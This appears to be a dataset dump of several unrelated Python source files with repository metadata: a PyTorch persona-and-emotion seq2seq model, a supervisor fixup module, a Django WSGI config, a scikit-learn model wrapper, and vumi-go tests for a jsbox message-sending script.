c_t = torch.cat((src_c_t[-1], src_c_t[-2]), 1)
else:
h_t = src_h_t[-1]
c_t = src_c_t[-1]
decoder_init_state = nn.Tanh()(self.encoder2decoder(h_t))
ctx = src_h.transpose(0, 1)
trg_h, (_, _) = self.decoder(
trg_emb, tag,
(decoder_init_state, c_t),
ctx,
ctx_mask
)
trg_h_reshape = trg_h.contiguous().view(
trg_h.size()[0] * trg_h.size()[1],
trg_h.size()[2]
)
decoder_logit = self.decoder2vocab(trg_h_reshape)
decoder_logit = decoder_logit.view(
trg_h.size()[0],
trg_h.size()[1],
decoder_logit.size()[1]
)
return decoder_logit
def decode(self, logits):
"""Return probability distribution over words."""
logits_reshape = logits.view(-1, self.vocab_size)
word_probs = F.softmax(logits_reshape)
word_probs = word_probs.view(
logits.size()[0], logits.size()[1], logits.size()[2]
)
return word_probs
def load_word_embedding(self, id2word):
import pickle
emb = np.zeros((self.vocab_size, self.emb_dim))
with open('feature/fasttextModel', 'br') as f:
model = pickle.load(f)
embed_dict = model.vocab
for idx in range(self.vocab_size):
word = id2word[idx]
if word in embed_dict:
vec = model.syn0[embed_dict[word].index]
emb[idx] = vec
else:
if word == '<pad>':
emb[idx] = np.zeros([self.emb_dim])
else:
emb[idx] = np.random.uniform(-1, 1, self.emb_dim)
self.embedding.weight = nn.Parameter(torch.FloatTensor(emb))
# self.word_embedding.weight.requires_grad = False
| 31.856618 | 79 | 0.586959 | import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
USE_CUDA = True
NUM_EMO = 9
class SoftDotAttention(nn.Module):
def __init__(self, dim):
super(SoftDotAttention, self).__init__()
self.linear_in = nn.Linear(dim, dim, bias=False)
self.sm = nn.Softmax()
self.linear_out = nn.Linear(dim * 2, dim, bias=False)
self.tanh = nn.Tanh()
self.mask = None
def forward(self, input, context):
target = self.linear_in(input).unsqueeze(2)
attn = torch.bmm(context, target).squeeze(2)
attn = self.sm(attn)
attn3 = attn.view(attn.size(0), 1, attn.size(1))
weighted_context = torch.bmm(attn3, context).squeeze(1)
h_tilde = torch.cat((weighted_context, input), 1)
h_tilde = self.tanh(self.linear_out(h_tilde))
return h_tilde, attn
class PersonaLSTMAttentionDot(nn.Module):
def __init__(self, input_size, hidden_size, batch_first=True):
super(PersonaLSTMAttentionDot, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.num_layers = 1
self.batch_first = batch_first
self.input_weights = nn.Linear(input_size, 4 * hidden_size)
self.hidden_weights = nn.Linear(hidden_size, 4 * hidden_size)
self.emotion_weights = nn.Embedding(NUM_EMO + 1, 4 * hidden_size)
self.attention_layer = SoftDotAttention(hidden_size)
def forward(self, input, tag, hidden, ctx, ctx_mask=None):
def recurrence(input, hidden):
hx, cx = hidden
gates = self.input_weights(input) + \
self.hidden_weights(hx) + \
self.emotion_weights(tag)
ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1)
ingate = F.sigmoid(ingate)
forgetgate = F.sigmoid(forgetgate)
cellgate = F.tanh(cellgate)
outgate = F.sigmoid(outgate)
cy = (forgetgate * cx) + (ingate * cellgate)
hy = outgate * F.tanh(cy)
h_tilde, alpha = self.attention_layer(hy, ctx.transpose(0, 1))
return h_tilde, cy
if self.batch_first:
input = input.transpose(0, 1)
output = []
steps = range(input.size(0))
for i in steps:
hidden = recurrence(input[i], hidden)
if isinstance(hidden, tuple):
output.append(hidden[0])
else:
output.append(hidden)
output = torch.cat(output, 0).view(input.size(0), *output[0].size())
if self.batch_first:
output = output.transpose(0, 1)
return output, hidden
class PersonaSeq2SeqAttentionSharedEmbedding(nn.Module):
def __init__(
self,
emb_dim,
vocab_size,
src_hidden_dim,
trg_hidden_dim,
ctx_hidden_dim,
attention_mode,
batch_size,
pad_token_src,
pad_token_trg,
bidirectional=True,
nlayers=2,
nlayers_trg=2,
dropout=0.,
):
super(PersonaSeq2SeqAttentionSharedEmbedding, self).__init__()
self.vocab_size = vocab_size
self.emb_dim = emb_dim
self.src_hidden_dim = src_hidden_dim
self.trg_hidden_dim = trg_hidden_dim
self.ctx_hidden_dim = ctx_hidden_dim
self.attention_mode = attention_mode
self.batch_size = batch_size
self.bidirectional = bidirectional
self.nlayers = nlayers
self.dropout = dropout
self.num_directions = 2 if bidirectional else 1
self.pad_token_src = pad_token_src
self.pad_token_trg = pad_token_trg
self.embedding = nn.Embedding(
vocab_size,
emb_dim,
self.pad_token_src
)
self.src_hidden_dim = src_hidden_dim // 2 \
if self.bidirectional else src_hidden_dim
self.encoder = nn.LSTM(
emb_dim,
self.src_hidden_dim,
nlayers,
bidirectional=bidirectional,
batch_first=True,
dropout=self.dropout
)
self.decoder = PersonaLSTMAttentionDot(
emb_dim,
trg_hidden_dim,
batch_first=True
)
self.encoder2decoder = nn.Linear(
self.src_hidden_dim * self.num_directions,
trg_hidden_dim
)
self.decoder2vocab = nn.Linear(trg_hidden_dim, vocab_size)
self.init_weights()
def init_weights(self):
initrange = 0.1
self.embedding.weight.data.uniform_(-initrange, initrange)
self.encoder2decoder.bias.data.fill_(0)
self.decoder2vocab.bias.data.fill_(0)
def get_state(self, input):
batch_size = input.size(0) \
if self.encoder.batch_first else input.size(1)
h0_encoder = Variable(torch.zeros(
self.encoder.num_layers * self.num_directions,
batch_size,
self.src_hidden_dim
), requires_grad=False)
c0_encoder = Variable(torch.zeros(
self.encoder.num_layers * self.num_directions,
batch_size,
self.src_hidden_dim
), requires_grad=False)
return h0_encoder.cuda(), c0_encoder.cuda()
def forward(self, input_src, input_trg, tag, trg_mask=None, ctx_mask=None):
src_emb = self.embedding(input_src)
trg_emb = self.embedding(input_trg)
self.h0_encoder, self.c0_encoder = self.get_state(input_src)
src_h, (src_h_t, src_c_t) = self.encoder(
src_emb, (self.h0_encoder, self.c0_encoder)
)
if self.bidirectional:
h_t = torch.cat((src_h_t[-1], src_h_t[-2]), 1)
c_t = torch.cat((src_c_t[-1], src_c_t[-2]), 1)
else:
h_t = src_h_t[-1]
c_t = src_c_t[-1]
decoder_init_state = nn.Tanh()(self.encoder2decoder(h_t))
ctx = src_h.transpose(0, 1)
trg_h, (_, _) = self.decoder(
trg_emb, tag,
(decoder_init_state, c_t),
ctx,
ctx_mask
)
trg_h_reshape = trg_h.contiguous().view(
trg_h.size()[0] * trg_h.size()[1],
trg_h.size()[2]
)
decoder_logit = self.decoder2vocab(trg_h_reshape)
decoder_logit = decoder_logit.view(
trg_h.size()[0],
trg_h.size()[1],
decoder_logit.size()[1]
)
return decoder_logit
def decode(self, logits):
logits_reshape = logits.view(-1, self.vocab_size)
word_probs = F.softmax(logits_reshape)
word_probs = word_probs.view(
logits.size()[0], logits.size()[1], logits.size()[2]
)
return word_probs
def load_word_embedding(self, id2word):
import pickle
emb = np.zeros((self.vocab_size, self.emb_dim))
with open('feature/fasttextModel', 'br') as f:
model = pickle.load(f)
embed_dict = model.vocab
for idx in range(self.vocab_size):
word = id2word[idx]
if word in embed_dict:
vec = model.syn0[embed_dict[word].index]
emb[idx] = vec
else:
if word == '<pad>':
emb[idx] = np.zeros([self.emb_dim])
else:
emb[idx] = np.random.uniform(-1, 1, self.emb_dim)
self.embedding.weight = nn.Parameter(torch.FloatTensor(emb))
| true | true |
1c3c9190e82fbad0ab082a919e7b7efda37b87a8 | 2,442 | py | Python | supervisor/resolution/fixup.py | wschoot/supervisor | 58f803cc9bf27f7f8873cb7667b687b839fd2d2a | [
"Apache-2.0"
] | null | null | null | supervisor/resolution/fixup.py | wschoot/supervisor | 58f803cc9bf27f7f8873cb7667b687b839fd2d2a | [
"Apache-2.0"
] | 200 | 2020-10-13T06:35:51.000Z | 2022-03-31T06:03:35.000Z | supervisor/resolution/fixup.py | sanyatuning/supervisor | 34f64b0ed00ccb4fcd4a60f903f7c8934c553a1c | [
"Apache-2.0"
] | null | null | null | """Helpers to fixup the system."""
import logging
from typing import List
from ..coresys import CoreSys, CoreSysAttributes
from ..jobs.const import JobCondition
from ..jobs.decorator import Job
from .data import Suggestion
from .fixups.base import FixupBase
from .fixups.clear_full_snapshot import FixupClearFullSnapshot
from .fixups.create_full_snapshot import FixupCreateFullSnapshot
from .fixups.store_execute_reload import FixupStoreExecuteReload
from .fixups.store_execute_remove import FixupStoreExecuteRemove
from .fixups.store_execute_reset import FixupStoreExecuteReset
_LOGGER: logging.Logger = logging.getLogger(__name__)
class ResolutionFixup(CoreSysAttributes):
"""Suggestion class for resolution."""
def __init__(self, coresys: CoreSys) -> None:
"""Initialize the suggestion class."""
self.coresys = coresys
self._create_full_snapshot = FixupCreateFullSnapshot(coresys)
self._clear_full_snapshot = FixupClearFullSnapshot(coresys)
self._store_execute_reset = FixupStoreExecuteReset(coresys)
self._store_execute_reload = FixupStoreExecuteReload(coresys)
self._store_execute_remove = FixupStoreExecuteRemove(coresys)
@property
def all_fixes(self) -> List[FixupBase]:
"""Return a list of all fixups.
Order can be important!
"""
return [
self._create_full_snapshot,
self._clear_full_snapshot,
self._store_execute_reload,
self._store_execute_reset,
self._store_execute_remove,
]
@Job(conditions=[JobCondition.HEALTHY])
async def run_autofix(self) -> None:
"""Run all startup fixes."""
_LOGGER.info("Starting system autofix at state %s", self.sys_core.state)
for fix in self.all_fixes:
if not fix.auto:
continue
try:
await fix()
except Exception as err: # pylint: disable=broad-except
_LOGGER.warning("Error during processing %s: %s", fix.suggestion, err)
self.sys_capture_exception(err)
_LOGGER.info("System autofix complete")
async def apply_fixup(self, suggestion: Suggestion) -> None:
"""Apply a fixup for a suggestion."""
for fix in self.all_fixes:
if fix.suggestion != suggestion.type or fix.context != suggestion.context:
continue
await fix()
| 35.911765 | 86 | 0.685504 | import logging
from typing import List
from ..coresys import CoreSys, CoreSysAttributes
from ..jobs.const import JobCondition
from ..jobs.decorator import Job
from .data import Suggestion
from .fixups.base import FixupBase
from .fixups.clear_full_snapshot import FixupClearFullSnapshot
from .fixups.create_full_snapshot import FixupCreateFullSnapshot
from .fixups.store_execute_reload import FixupStoreExecuteReload
from .fixups.store_execute_remove import FixupStoreExecuteRemove
from .fixups.store_execute_reset import FixupStoreExecuteReset
_LOGGER: logging.Logger = logging.getLogger(__name__)
class ResolutionFixup(CoreSysAttributes):
def __init__(self, coresys: CoreSys) -> None:
self.coresys = coresys
self._create_full_snapshot = FixupCreateFullSnapshot(coresys)
self._clear_full_snapshot = FixupClearFullSnapshot(coresys)
self._store_execute_reset = FixupStoreExecuteReset(coresys)
self._store_execute_reload = FixupStoreExecuteReload(coresys)
self._store_execute_remove = FixupStoreExecuteRemove(coresys)
@property
def all_fixes(self) -> List[FixupBase]:
return [
self._create_full_snapshot,
self._clear_full_snapshot,
self._store_execute_reload,
self._store_execute_reset,
self._store_execute_remove,
]
@Job(conditions=[JobCondition.HEALTHY])
async def run_autofix(self) -> None:
_LOGGER.info("Starting system autofix at state %s", self.sys_core.state)
for fix in self.all_fixes:
if not fix.auto:
continue
try:
await fix()
except Exception as err:
_LOGGER.warning("Error during processing %s: %s", fix.suggestion, err)
self.sys_capture_exception(err)
_LOGGER.info("System autofix complete")
async def apply_fixup(self, suggestion: Suggestion) -> None:
for fix in self.all_fixes:
if fix.suggestion != suggestion.type or fix.context != suggestion.context:
continue
await fix()
| true | true |
1c3c9412efdc3bd4cb9ab2242cb6c81707718094 | 415 | py | Python | backend/long_darkness_29195/wsgi.py | crowdbotics-apps/long-darkness-29195 | 98f34a3ee9a7656f19a26b7c865e5de78839518c | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/long_darkness_29195/wsgi.py | crowdbotics-apps/long-darkness-29195 | 98f34a3ee9a7656f19a26b7c865e5de78839518c | [
"FTL",
"AML",
"RSA-MD"
] | 49 | 2021-07-26T17:04:51.000Z | 2021-07-26T17:07:44.000Z | backend/long_darkness_29195/wsgi.py | crowdbotics-apps/long-darkness-29195 | 98f34a3ee9a7656f19a26b7c865e5de78839518c | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | """
WSGI config for long_darkness_29195 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'long_darkness_29195.settings')
application = get_wsgi_application()
| 24.411765 | 79 | 0.79759 |
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'long_darkness_29195.settings')
application = get_wsgi_application()
| true | true |
1c3c943c63d83e4a71845752358be989ec75ad82 | 2,513 | py | Python | api/ml/model.py | ghacupha/fastapi-ml-quickstart | 866068eb2b2ea7f08003947e80f57bdacb24db81 | [
"MIT"
] | null | null | null | api/ml/model.py | ghacupha/fastapi-ml-quickstart | 866068eb2b2ea7f08003947e80f57bdacb24db81 | [
"MIT"
] | null | null | null | api/ml/model.py | ghacupha/fastapi-ml-quickstart | 866068eb2b2ea7f08003947e80f57bdacb24db81 | [
"MIT"
] | null | null | null | import joblib
import numpy as np
from pathlib import Path
from sklearn.ensemble import RandomForestRegressor
from sklearn.datasets import load_boston
class Model:
"""
Models Definition.
This is a general representation of what we do with a model that we are serving, henceforth
applied as the matrix throughout the application
"""
def __init__(self, model_path: str = None):
self._model = None
self._model_path = model_path
self.load()
def train(self, X: np.ndarray, y: np.ndarray):
"""
Model definition and training.
This method creates a model using the underlying library implementation, the data
provided in the feature matrix X, is related to the data in the matrix y
"""
self._model = RandomForestRegressor()
self._model.fit(X, y)
return self
def predict(self, X: np.ndarray) -> np.ndarray:
"""
Prediction logic.
Returns array with predictions corresponding to the input matrix X
"""
return self._model.predict(X)
def save(self):
"""
Model persistence to the file system.
This method saves the model to the path provided when creating the model object; internally the
implementation uses joblib
"""
if self._model is not None:
joblib.dump(self._model, self._model_path)
else:
raise TypeError("The model is not trained yet, use .train() before saving")
def load(self):
"""
Load model from file system.
This method creates the persistent, trained model as saved in the file system using joblib. It is
important for consistency to use the same version of joblib when saving the model and when loading it
"""
try:
self._model = joblib.load(self._model_path)
except:
self._model = None
return self
model_path = Path(__file__).parent / "model.joblib"
n_features = load_boston(return_X_y=True)[0].shape[1]
model = Model(model_path)
def get_model():
"""
Model singleton.
This function returns the model to be used through out the application. The model is already
configured and trained and is ready for use in prediction. The same is loaded from the file
system model.joblib file
"""
return model
if __name__ == "__main__":
X, y = load_boston(return_X_y=True)
model.train(X, y)
model.save()
| 28.556818 | 109 | 0.645444 | import joblib
import numpy as np
from pathlib import Path
from sklearn.ensemble import RandomForestRegressor
from sklearn.datasets import load_boston
class Model:
def __init__(self, model_path: str = None):
self._model = None
self._model_path = model_path
self.load()
def train(self, X: np.ndarray, y: np.ndarray):
self._model = RandomForestRegressor()
self._model.fit(X, y)
return self
def predict(self, X: np.ndarray) -> np.ndarray:
return self._model.predict(X)
def save(self):
if self._model is not None:
joblib.dump(self._model, self._model_path)
else:
raise TypeError("The model is not trained yet, use .train() before saving")
def load(self):
try:
self._model = joblib.load(self._model_path)
except:
self._model = None
return self
model_path = Path(__file__).parent / "model.joblib"
n_features = load_boston(return_X_y=True)[0].shape[1]
model = Model(model_path)
def get_model():
return model
if __name__ == "__main__":
X, y = load_boston(return_X_y=True)
model.train(X, y)
model.save()
| true | true |
1c3c94f3fa15114d5deef225333bf840a40813b0 | 13,896 | py | Python | go/scripts/tests/test_jsbox_send.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | go/scripts/tests/test_jsbox_send.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | go/scripts/tests/test_jsbox_send.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | import json
from StringIO import StringIO
from tempfile import NamedTemporaryFile
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.internet.task import Clock
from twisted.python import usage
from vumi.tests.helpers import VumiTestCase
from go.scripts.jsbox_send import (
JsBoxSendWorker, JsBoxSendOptions, ScriptError, Ticker)
from go.vumitools.tests.helpers import VumiApiHelper, GoMessageHelper
class TestJsBoxSendOptions(VumiTestCase):
    """Tests for JsBoxSendOptions command-line parsing."""

    # Mandatory options appended to every parse (unless disabled) so each
    # test only supplies the flags it actually exercises.
    DEFAULT_ARGS = (
        "--vumigo-config", "default.yaml",
        "--user-account-key", "user-123",
        "--conversation-key", "conv-456",
    )

    def mk_opts(self, args, add_defaults=True):
        """Parse ``args`` into a JsBoxSendOptions instance.

        :param add_defaults:
            When True (the default), DEFAULT_ARGS is appended so the
            required options are always present. Fix: this flag was
            previously accepted but silently ignored.
        """
        if add_defaults:
            args.extend(self.DEFAULT_ARGS)
        opts = JsBoxSendOptions()
        opts.parseOptions(args)
        return opts

    def test_hz_default(self):
        # --hz defaults to 60 ticks per second.
        opts = self.mk_opts([])
        self.assertEqual(opts['hz'], 60.0)

    def test_hz_override(self):
        opts = self.mk_opts(["--hz", '10.0'])
        self.assertEqual(opts['hz'], 10.0)

    def test_hz_negative_or_zero(self):
        # Non-positive tick rates are rejected at parse time.
        self.assertRaises(
            usage.UsageError,
            self.mk_opts, ["--hz", "-5.0"])

    def test_hz_not_numeric(self):
        self.assertRaises(
            usage.UsageError,
            self.mk_opts, ["--hz", "foo"])
class TestTicker(VumiTestCase):
    """Tests for Ticker rate limiting, driven by a fake Twisted Clock."""
    def setUp(self):
        self.override_ticker_clock()
    def override_ticker_clock(self):
        # Swap Ticker's reactor for a Clock so the tests control time;
        # the real clock is restored during cleanup.
        orig_clock = Ticker.clock
        def restore_clock():
            Ticker.clock = orig_clock
        Ticker.clock = Clock()
        self.add_cleanup(restore_clock)
    def test_first_tick(self):
        # The very first tick fires as soon as the reactor turns (0 delay).
        t = Ticker(hz=1)
        d1 = t.tick()
        self.assertFalse(d1.called)
        t.clock.advance(0)
        self.assertTrue(d1.called)
    def test_fast(self):
        # Ticking again before the 1s period elapsed must wait out the
        # remainder of the period.
        t = Ticker(hz=1)
        t.tick()
        t.clock.advance(0.1)
        d = t.tick()
        self.assertFalse(d.called)
        t.clock.advance(0.5)
        self.assertFalse(d.called)
        t.clock.advance(0.5)
        self.assertTrue(d.called)
    def test_slow(self):
        # If more than a full period has already passed, the next tick
        # fires on the next reactor turn.
        t = Ticker(hz=1)
        t.tick()
        t.clock.advance(1.5)
        d = t.tick()
        self.assertFalse(d.called)
        t.clock.advance(0)
        self.assertTrue(d.called)
class TestJsBoxSend(VumiTestCase):
    """Integration tests for JsBoxSendWorker using in-memory vumi helpers."""
    @inlineCallbacks
    def setUp(self):
        self.vumi_helper = yield self.add_helper(VumiApiHelper())
        self.user_helper = yield self.vumi_helper.get_or_create_user()
        self.msg_helper = yield self.add_helper(
            GoMessageHelper(self.vumi_helper))
    # Builds the worker under test with stdout captured for assertions.
    @inlineCallbacks
    def get_worker(self):
        vumigo_config = self.vumi_helper.mk_config({})
        worker_helper = self.vumi_helper.get_worker_helper()
        worker = yield worker_helper.get_worker(JsBoxSendWorker, vumigo_config)
        worker.stdout = StringIO()
        returnValue(worker)
    @inlineCallbacks
    def test_get_conversation_jsbox(self):
        conv = yield self.user_helper.create_conversation(u'jsbox')
        worker = yield self.get_worker()
        loaded_conv = yield worker.get_conversation(
            self.user_helper.account_key, conv.key)
        self.assertEqual(conv.key, loaded_conv.key)
    @inlineCallbacks
    def test_get_conversation_dialogue(self):
        conv = yield self.user_helper.create_conversation(u'dialogue')
        worker = yield self.get_worker()
        loaded_conv = yield worker.get_conversation(
            self.user_helper.account_key, conv.key)
        self.assertEqual(conv.key, loaded_conv.key)
    # Only jsbox/dialogue conversations are supported; others raise.
    @inlineCallbacks
    def test_get_conversation_unsupported_type(self):
        conv = yield self.user_helper.create_conversation(u'bulk_send')
        worker = yield self.get_worker()
        failure = yield self.assertFailure(worker.get_conversation(
            self.user_helper.account_key, conv.key), ScriptError)
        self.assertEqual(
            str(failure), "Unsupported conversation type: bulk_send")
    # The delivery class is read from conversation-type-specific config.
    @inlineCallbacks
    def test_get_delivery_class_jsbox(self):
        conv = yield self.user_helper.create_conversation(
            u'jsbox',
            config={
                'jsbox_app_config': {
                    'config': {
                        'key': 'config',
                        'value': json.dumps({
                            'delivery_class': 'twitter',
                        })
                    },
                },
            })
        worker = yield self.get_worker()
        self.assertEqual(worker.get_delivery_class(conv), 'twitter')
    @inlineCallbacks
    def test_get_delivery_class_dialogue(self):
        conv = yield self.user_helper.create_conversation(
            u'dialogue',
            config={
                'poll': {
                    'poll_metadata': {
                        'delivery_class': 'mxit',
                    },
                },
            })
        worker = yield self.get_worker()
        self.assertEqual(worker.get_delivery_class(conv), 'mxit')
    @inlineCallbacks
    def test_get_conversation_missing(self):
        worker = yield self.get_worker()
        failure = yield self.assertFailure(worker.get_conversation(
            self.user_helper.account_key, u'badkey'), ScriptError)
        self.assertEqual(str(failure), "Conversation not found: badkey")
    @inlineCallbacks
    def test_send_to_conv_jsbox(self):
        conv = yield self.user_helper.create_conversation(u'jsbox')
        worker = yield self.get_worker()
        worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
        msg = self.msg_helper.make_inbound('foo')
        self.assertEqual(worker_helper.get_dispatched_inbound(), [])
        worker.send_to_conv(conv, msg)
        self.assertEqual(worker_helper.get_dispatched_inbound(), [msg])
    @inlineCallbacks
    def test_send_to_conv_dialogue(self):
        conv = yield self.user_helper.create_conversation(u'dialogue')
        worker = yield self.get_worker()
        worker_helper = self.vumi_helper.get_worker_helper(
            'dialogue_transport')
        msg = self.msg_helper.make_inbound('foo')
        self.assertEqual(worker_helper.get_dispatched_inbound(), [])
        worker.send_to_conv(conv, msg)
        self.assertEqual(worker_helper.get_dispatched_inbound(), [msg])
    # The trigger is logged to stdout and dispatched as an inbound message
    # flagged with inbound_push_trigger.
    @inlineCallbacks
    def test_send_inbound_push_trigger(self):
        conv = yield self.user_helper.create_conversation(u'jsbox')
        worker = yield self.get_worker()
        worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
        self.assertEqual(worker_helper.get_dispatched_inbound(), [])
        self.assertEqual(worker.stdout.getvalue(), '')
        yield worker.send_inbound_push_trigger('+27831234567', conv)
        self.assertEqual(
            worker.stdout.getvalue(),
            "Starting u'My Conversation' [%s] -> +27831234567\n" % (conv.key,))
        [msg] = worker_helper.get_dispatched_inbound()
        self.assertEqual(msg['inbound_push_trigger'], True)
        self.assertEqual(msg['from_addr'], '+27831234567')
    @inlineCallbacks
    def test_get_excluded_addrs_no_file(self):
        worker = yield self.get_worker()
        excluded_addrs = worker.get_excluded_addrs(None)
        self.assertEqual(excluded_addrs, set())
    @inlineCallbacks
    def test_get_excluded_addrs_simple(self):
        exclude_file = NamedTemporaryFile()
        exclude_file.write('addr1\naddr2')
        exclude_file.flush()
        worker = yield self.get_worker()
        excluded_addrs = worker.get_excluded_addrs(exclude_file.name)
        self.assertEqual(excluded_addrs, set(['addr1', 'addr2']))
    # Whitespace and duplicate entries in the exclusion file are normalised.
    @inlineCallbacks
    def test_get_excluded_addrs_messy(self):
        exclude_file = NamedTemporaryFile()
        exclude_file.write('addr1 \naddr2\n\naddr1\n\taddr3\n')
        exclude_file.flush()
        worker = yield self.get_worker()
        excluded_addrs = worker.get_excluded_addrs(exclude_file.name)
        self.assertEqual(excluded_addrs, set(['addr1', 'addr2', 'addr3']))
    @inlineCallbacks
    def test_get_contacts_for_addrs_no_groups(self):
        conv = yield self.user_helper.create_conversation(u'jsbox')
        worker = yield self.get_worker()
        addrs = yield worker.get_contact_addrs_for_conv(conv, None, set())
        self.assertEqual(addrs, [])
        self.assertEqual(worker.stdout.getvalue(), '')
    @inlineCallbacks
    def test_get_contacts_for_addrs_small_group(self):
        cs = self.user_helper.user_api.contact_store
        grp = yield cs.new_group(u'group')
        contacts = [
            (yield cs.new_contact(msisdn=u'+01', groups=[grp])),
            (yield cs.new_contact(msisdn=u'+02', groups=[grp])),
            (yield cs.new_contact(msisdn=u'+03', groups=[grp])),
        ]
        conv = yield self.user_helper.create_conversation(
            u'jsbox', groups=[grp])
        worker = yield self.get_worker()
        addrs = yield worker.get_contact_addrs_for_conv(conv, None, set())
        self.assertEqual(
            sorted(addrs), sorted([c.msisdn for c in contacts]))
        self.assertEqual(worker.stdout.getvalue(), 'Addresses collected: 3\n')
    # With an explicit delivery class, addresses come from that field.
    @inlineCallbacks
    def test_get_contacts_for_addrs_gtalk(self):
        cs = self.user_helper.user_api.contact_store
        grp = yield cs.new_group(u'group')
        contacts = [
            (yield cs.new_contact(msisdn=u'', gtalk_id=u'1@a', groups=[grp])),
            (yield cs.new_contact(msisdn=u'', gtalk_id=u'2@a', groups=[grp])),
            (yield cs.new_contact(msisdn=u'', gtalk_id=u'3@a', groups=[grp])),
        ]
        conv = yield self.user_helper.create_conversation(
            u'jsbox', groups=[grp])
        worker = yield self.get_worker()
        addrs = yield worker.get_contact_addrs_for_conv(conv, 'gtalk', set())
        self.assertEqual(sorted(addrs), sorted([c.gtalk_id for c in contacts]))
    @inlineCallbacks
    def test_get_contacts_for_addrs_exclude_list(self):
        cs = self.user_helper.user_api.contact_store
        grp = yield cs.new_group(u'group')
        yield cs.new_contact(msisdn=u'+01', groups=[grp])
        yield cs.new_contact(msisdn=u'+02', groups=[grp])
        yield cs.new_contact(msisdn=u'+03', groups=[grp])
        conv = yield self.user_helper.create_conversation(
            u'jsbox', groups=[grp])
        worker = yield self.get_worker()
        excluded = set(['+02', '+04'])
        addrs = yield worker.get_contact_addrs_for_conv(conv, None, excluded)
        self.assertEqual(sorted(addrs), ['+01', '+03'])
        self.assertEqual(worker.stdout.getvalue(), 'Addresses collected: 2\n')
    @inlineCallbacks
    def test_send_jsbox_default_delivery_class(self):
        cs = self.user_helper.user_api.contact_store
        grp = yield cs.new_group(u'group')
        contacts = [
            (yield cs.new_contact(msisdn=u'+01', groups=[grp])),
            (yield cs.new_contact(msisdn=u'+02', groups=[grp])),
            (yield cs.new_contact(msisdn=u'+03', groups=[grp])),
        ]
        conv = yield self.user_helper.create_conversation(
            u'jsbox', groups=[grp])
        worker = yield self.get_worker()
        worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
        self.assertEqual(worker_helper.get_dispatched_inbound(), [])
        yield worker.send_jsbox(self.user_helper.account_key, conv.key)
        msgs = worker_helper.get_dispatched_inbound()
        msg_addrs = sorted(msg['from_addr'] for msg in msgs)
        self.assertEqual(msg_addrs, [c.msisdn for c in contacts])
        self.assertTrue(all(msg['inbound_push_trigger'] for msg in msgs))
    @inlineCallbacks
    def test_send_jsbox_gtalk(self):
        cs = self.user_helper.user_api.contact_store
        grp = yield cs.new_group(u'group')
        contacts = [
            (yield cs.new_contact(msisdn=u'', gtalk_id=u'1@a', groups=[grp])),
            (yield cs.new_contact(msisdn=u'', gtalk_id=u'2@a', groups=[grp])),
            (yield cs.new_contact(msisdn=u'', gtalk_id=u'3@a', groups=[grp])),
        ]
        conv = yield self.user_helper.create_conversation(
            u'jsbox', groups=[grp], config={'jsbox_app_config': {'config': {
                'key': 'config',
                'value': json.dumps({'delivery_class': 'gtalk'}),
            }}})
        worker = yield self.get_worker()
        worker_helper = self.vumi_helper.get_worker_helper('jsbox_transport')
        self.assertEqual(worker_helper.get_dispatched_inbound(), [])
        yield worker.send_jsbox(self.user_helper.account_key, conv.key)
        msgs = worker_helper.get_dispatched_inbound()
        msg_addrs = sorted(msg['from_addr'] for msg in msgs)
        self.assertEqual(msg_addrs, [c.gtalk_id for c in contacts])
        self.assertTrue(all(msg['inbound_push_trigger'] for msg in msgs))
    # Progress is reported every 100 messages for large sends.
    @inlineCallbacks
    def test_send_jsbox_big_group(self):
        conv = yield self.user_helper.create_conversation(u'jsbox')
        worker = yield self.get_worker()
        def generate_contact_addrs(conv, delivery_class, excluded_addrs):
            # NOTE(review): '%03s' pads with spaces, not zeros — '%03d' may
            # have been intended; harmless here since addresses are stubs.
            return ['+27831234%03s' % i for i in xrange(1000)]
        worker.get_contact_addrs_for_conv = generate_contact_addrs
        worker.send_inbound_push_trigger = lambda to_addr, conversation: None
        yield worker.send_jsbox(self.user_helper.account_key, conv.key, 1000)
        self.assertEqual(worker.stdout.getvalue(), ''.join([
            'Messages sent: 100 / 1000\n',
            'Messages sent: 200 / 1000\n',
            'Messages sent: 300 / 1000\n',
            'Messages sent: 400 / 1000\n',
            'Messages sent: 500 / 1000\n',
            'Messages sent: 600 / 1000\n',
            'Messages sent: 700 / 1000\n',
            'Messages sent: 800 / 1000\n',
            'Messages sent: 900 / 1000\n',
            'Messages sent: 1000 / 1000\n',
        ]))
| 38.38674 | 79 | 0.636874 | import json
from StringIO import StringIO
from tempfile import NamedTemporaryFile
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.internet.task import Clock
from twisted.python import usage
from vumi.tests.helpers import VumiTestCase
from go.scripts.jsbox_send import (
JsBoxSendWorker, JsBoxSendOptions, ScriptError, Ticker)
from go.vumitools.tests.helpers import VumiApiHelper, GoMessageHelper
class TestJsBoxSendOptions(VumiTestCase):
    """Tests for JsBoxSendOptions command-line parsing."""

    # Mandatory options appended to every parse (unless disabled) so each
    # test only supplies the flags it actually exercises.
    DEFAULT_ARGS = (
        "--vumigo-config", "default.yaml",
        "--user-account-key", "user-123",
        "--conversation-key", "conv-456",
    )

    def mk_opts(self, args, add_defaults=True):
        """Parse ``args`` into a JsBoxSendOptions instance.

        :param add_defaults:
            When True (the default), DEFAULT_ARGS is appended so the
            required options are always present. Fix: this flag was
            previously accepted but silently ignored.
        """
        if add_defaults:
            args.extend(self.DEFAULT_ARGS)
        opts = JsBoxSendOptions()
        opts.parseOptions(args)
        return opts

